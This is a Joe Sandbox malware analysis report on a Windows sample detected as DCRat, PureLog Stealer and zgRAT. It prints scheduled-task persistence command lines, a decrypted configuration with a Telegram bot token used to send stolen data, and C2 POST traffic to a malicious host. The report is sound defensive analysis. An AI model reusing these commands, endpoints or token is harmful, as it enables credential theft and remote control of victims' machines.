Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YGk3y6Tdix.exe

Overview

General Information

Sample name:YGk3y6Tdix.exe
renamed because original name is a hash value
Original sample name:e38b0fc914530e6682d067159b0c7c34.exe
Analysis ID:1583014
MD5:e38b0fc914530e6682d067159b0c7c34
SHA1:4661a00c6e199b1277b2af3bb72e5ebc22cbe2d3
SHA256:476f2ddc0f7c7ef512c71a6faadfead61424d57abf2e4566d48b8dd84545c6cb
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates processes via WMI
Drops PE files with benign system names
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • YGk3y6Tdix.exe (PID: 6976 cmdline: "C:\Users\user\Desktop\YGk3y6Tdix.exe" MD5: E38B0FC914530E6682D067159B0C7C34)
    • wscript.exe (PID: 7144 cmdline: "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 416 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Drivers\QSdmXzK8rClLDrHgb.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 1700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • fontdrvhost.exe (PID: 5012 cmdline: "C:\/Drivers/fontdrvhost.exe" MD5: BA58757137700B6B304B45298D986EB1)
          • schtasks.exe (PID: 4348 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 12 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1216 cmdline: schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2992 cmdline: schtasks.exe /create /tn "servicess" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\SIGNUP\services.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4144 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 12 /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6120 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3068 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6020 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3752 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7048 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6996 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5480 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7152 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1068 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6256 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQ" /sc ONLOGON /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5780 cmdline: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 11 /tr "'C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2260 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Drivers\fontdrvhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3168 cmdline: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1308 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Drivers\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 7224 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lscqkorEZ8.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 7272 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • PING.EXE (PID: 7292 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
            • FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe (PID: 7776 cmdline: "C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe" MD5: BA58757137700B6B304B45298D986EB1)
  • fontdrvhost.exe (PID: 6996 cmdline: C:\Drivers\fontdrvhost.exe MD5: BA58757137700B6B304B45298D986EB1)
  • fontdrvhost.exe (PID: 6324 cmdline: C:\Drivers\fontdrvhost.exe MD5: BA58757137700B6B304B45298D986EB1)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
YGk3y6Tdix.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    YGk3y6Tdix.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Drivers\fontdrvhost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Drivers\fontdrvhost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files\Internet Explorer\SIGNUP\services.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries
                SourceRuleDescriptionAuthorStrings
                0000001A.00000002.2900490513.0000000002CE5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000003.1645430393.00000000051B9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000004.00000000.1672060273.0000000000B82000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        00000000.00000003.1644690236.0000000006812000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                          Click to see the 4 entries
                          SourceRuleDescriptionAuthorStrings
                          0.3.YGk3y6Tdix.exe.68606f6.0.raw.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.3.YGk3y6Tdix.exe.68606f6.0.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                              0.3.YGk3y6Tdix.exe.68606f6.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                0.3.YGk3y6Tdix.exe.68606f6.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                                  0.3.YGk3y6Tdix.exe.52076f6.1.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                                    Click to see the 5 entries

                                    System Summary

                                    barindex
                                    Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\YGk3y6Tdix.exe, ProcessId: 6976, TargetFilename: C:\Drivers\fontdrvhost.exe
                                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f, CommandLine: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\/Drivers/fontdrvhost.exe", ParentImage: C:\Drivers\fontdrvhost.exe, ParentProcessId: 5012, ParentProcessName: fontdrvhost.exe, ProcessCommandLine: schtasks.exe /create /tn "FDhouUKjYnvlBIdtOklvQSsmeAjQF" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe'" /f, ProcessId: 6020, ProcessName: schtasks.exe
                                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\YGk3y6Tdix.exe", ParentImage: C:\Users\user\Desktop\YGk3y6Tdix.exe, ParentProcessId: 6976, ParentProcessName: YGk3y6Tdix.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbe" , ProcessId: 7144, ProcessName: wscript.exe
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-01T14:52:07.667335+010020480951A Network Trojan was detected192.168.2.449733104.21.38.8480TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-01T14:52:00.960663+010028033053Unknown Traffic192.168.2.44973134.117.59.81443TCP
                                    2025-01-01T14:52:13.163133+010028033053Unknown Traffic192.168.2.44974934.117.59.81443TCP
                                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                    2025-01-01T14:52:02.454624+010018100091Potentially Bad Traffic192.168.2.449732149.154.167.220443TCP
                                    2025-01-01T14:52:14.162081+010018100091Potentially Bad Traffic192.168.2.449753149.154.167.220443TCP

                                    Click to jump to signature section

                                    Show All Signature Results

                                    AV Detection

                                    barindex
                                    Source: YGk3y6Tdix.exeAvira: detected
                                    Source: http://250345cm.renyash.ru/Avira URL Cloud: Label: malware
                                    Source: http://250345cm.renyash.ru/sqltemp.phpAvira URL Cloud: Label: malware
                                    Source: http://250345cm.renyash.ruAvira URL Cloud: Label: malware
                                    Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Drivers\6RHoR6LVzzezwu6iEjrLxYdAHRXCcmMIlUFOAkT.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                                    Source: C:\Users\user\Desktop\CANODYsk.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\Desktop\MihenAyR.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Drivers\fontdrvhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Program Files\Internet Explorer\SIGNUP\services.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\AppData\Local\Temp\lscqkorEZ8.batAvira: detection malicious, Label: BAT/Delbat.C
                                    Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                                    Source: C:\Users\user\Desktop\BimGJlFQ.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                                    Source: C:\Users\user\Desktop\LRGWtOLy.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                                    Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeReversingLabs: Detection: 72%
                                    Source: C:\Drivers\fontdrvhost.exeReversingLabs: Detection: 72%
                                    Source: C:\Program Files\Internet Explorer\SIGNUP\services.exeReversingLabs: Detection: 72%
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeReversingLabs: Detection: 72%
                                    Source: C:\Users\Default\AppData\Local\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeReversingLabs: Detection: 72%
                                    Source: C:\Users\user\Desktop\BimGJlFQ.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\CANODYsk.logReversingLabs: Detection: 50%
                                    Source: C:\Users\user\Desktop\LRGWtOLy.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\MihenAyR.logReversingLabs: Detection: 70%
                                    Source: C:\Users\user\Desktop\iIcaGucE.logReversingLabs: Detection: 25%
                                    Source: C:\Users\user\Desktop\jqKBOCJa.logReversingLabs: Detection: 25%
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeReversingLabs: Detection: 72%
                                    Source: YGk3y6Tdix.exeVirustotal: Detection: 59%Perma Link
                                    Source: YGk3y6Tdix.exeReversingLabs: Detection: 63%
                                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                    Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\aFStzZSn.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\MihenAyR.logJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\RKjvWuQm.logJoe Sandbox ML: detected
                                    Source: C:\Drivers\fontdrvhost.exeJoe Sandbox ML: detected
                                    Source: C:\Program Files\Internet Explorer\SIGNUP\services.exeJoe Sandbox ML: detected
                                    Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\jWKBqQkB.logJoe Sandbox ML: detected
                                    Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\sRuyTvnC.logJoe Sandbox ML: detected
                                    Source: C:\Drivers\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeJoe Sandbox ML: detected
                                    Source: C:\Users\user\Desktop\LRGWtOLy.logJoe Sandbox ML: detected
                                    Source: YGk3y6Tdix.exeJoe Sandbox ML: detected
                                    Source: 00000004.00000002.1758457404.00000000132D5000.00000004.00000800.00020000.00000000.sdmpString decryptor: {"0":[],"2a025748-b498-4ae9-8f8c-b763dd8b5ffc":{"_0":"Smart","_1":"False","_2":"False","_3":"False"},"TelegramNotifer":{"chatid":"6283373442","bottoken":"8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg","settings":"new user connect !\nID: {USERID}\nComment: {COMMENT}\nUsername: {USERNAME}\nPC Name: {PCNAME}\nIP: {IP}\nGEO: {GEO}","sendmessageonce":"True","sendloginfostealer":"True","stealersetting":"Log collected\nID: {USERID}\nComment: {COMMENT}\nLog size: {SIZE}"},"90f3c523-0b6b-4956-a617-29c89ed8da84":{"_0":"mail.google.com;example.com;any.domain.net","_1":"mail.google.com;example.com;any.domain.net"}}
                                    Source: 00000004.00000002.1758457404.00000000132D5000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","fontdrvhost","0","NEWORK PC","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGtTRW94V2xOSmMwbHFUV2xQYVVvd1kyNVdiRWxwZDJsT1EwazJTVzVTZVdSWFZXbE1RMGt4U1dwdmFXUklTakZhVTBselNXcFphVTlwU2pCamJsWnNTV2wzYVU1NVNUWkpibEo1WkZkVmFVeERTVFJKYW05cFpFaEtNVnBUU1hOSmFtdHBUMmxLTUdOdVZteEphWGRwVFZSQmFVOXBTakJqYmxac1NXbDNhVTFVUldsUGFVb3dZMjVXYkVscGQybE5WRWxwVDJsS01HTnVWbXhKYVhkcFRWUk5hVTlwU2pCamJsWnNTV2wzYVUxVVVXbFBhVW93WTI1V2JFbHVNRDBpWFE9PSJd"]
                                    Source: YGk3y6Tdix.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: C:\Drivers\fontdrvhost.exeDirectory created: C:\Program Files\Internet Explorer\SIGNUP\services.exeJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeDirectory created: C:\Program Files\Internet Explorer\SIGNUP\c5b4cb5e9653ccJump to behavior
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49730 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49744 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
                                    Source: YGk3y6Tdix.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: YGk3y6Tdix.exe
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00FAA69B
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00FBC220

                                    Networking

                                    barindex
                                    Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49733 -> 104.21.38.84:80
                                    Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.4:49732 -> 149.154.167.220:443
                                    Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.4:49753 -> 149.154.167.220:443
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: unknownDNS query: name: api.telegram.org
                                    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                    Source: global trafficHTTP traffic detected: POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="df078fe5-ba23-4170-8bea-85b5048774e2"Host: api.telegram.orgContent-Length: 86411Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /ip HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: GET /country HTTP/1.1Host: ipinfo.io
                                    Source: global trafficHTTP traffic detected: POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="a8ac2ac3-d8f0-4277-97c7-16037a3c7cfa"Host: api.telegram.orgContent-Length: 92361Expect: 100-continueConnection: Keep-Alive
                                    Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                                    Source: Joe Sandbox ViewIP Address: 34.117.59.81 34.117.59.81
                                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                                    Source: unknownDNS query: name: ipinfo.io
                                    Source: unknownDNS query: name: ipinfo.io
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49731 -> 34.117.59.81:443
                                    Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49749 -> 34.117.59.81:443
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 384Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1508Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1012Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /sqltemp.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 250345cm.renyash.ruContent-Length: 1008Expect: 100-continueConnection: Keep-Alive
